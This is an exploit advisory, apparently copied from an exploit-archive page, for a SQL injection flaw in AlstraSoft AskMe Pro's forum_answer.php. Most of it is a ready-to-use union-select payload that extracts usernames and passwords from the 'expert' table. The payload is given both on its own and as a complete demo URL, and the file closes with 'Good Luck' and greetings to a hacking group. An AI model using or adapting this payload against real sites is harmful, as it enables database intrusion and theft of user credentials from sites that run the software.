28 lines
No EOL
1 KiB
Text
Executable file
28 lines
No EOL
1 KiB
Text
Executable file
==================================================================
|
|
# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability
|
|
# Date: 12/09/2010
|
|
# Author: Amine_92
|
|
# Email: amine92_16@hotmail.fr
|
|
# Software Link: http://www.alstrasoft.com/askme.htm
|
|
# Version: All Version
|
|
# Price: 99.99$
|
|
# Tested on: Xp Sp 2
|
|
# Home: Dark Zone Organization (www.v9b.org/vb)
|
|
==================================================================
|
|
SQL injection in AlstraSoft AskMe Pro
|
|
|
|
Affected items:
|
|
http://www.Victime.com/forum_answer.php?que_id=[SQL]
|
|
|
|
Example:
|
|
-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
|
|
|
|
Demo URL:
|
|
http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert--
|
|
|
|
==================================================================
|
|
Good Luck
|
|
|
|
Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero
|
|
|
|
Don't Forget Our Brother In Gaza & Palestine |